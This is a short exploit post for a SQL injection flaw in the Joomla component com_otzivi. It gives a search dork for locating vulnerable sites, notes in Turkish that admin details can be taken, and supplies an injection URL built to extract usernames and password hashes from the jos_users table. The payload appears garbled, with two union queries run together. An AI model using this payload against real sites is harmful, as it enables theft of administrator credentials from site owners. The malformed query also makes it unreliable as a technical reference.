<------------------- header data start ------------------- > ############################################################# # Joomla Component com_otzivi Blind SQL Injection Vulnerability ############################################################# # Author : Cyber_945 # Home : Ar-ge.Org # Greetz : By.Danger,D3xer,LionTurk and All Ar-ge.Org Members # Not3 : Ar-ge.Org Online # Name : com_otzivi # Bug Type : Blind SQL Injection # Infection : Adminin bilgileri alinabilir. Dork : : inurl:/index.php?option=com_otzivi ############################################################# =======================C=y=b=e=r=_=9=4=5================ < -- bug code start -- > http://server/index.php?option=com_otzivi&Itemid=15+and+1=2+union+select+concat(id,0x3a,username,0x3a,password),1+from+jos_users7,8,concat(username,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/from/**/jos_users-- =======================C=y=b=e=r=_=9=4=5================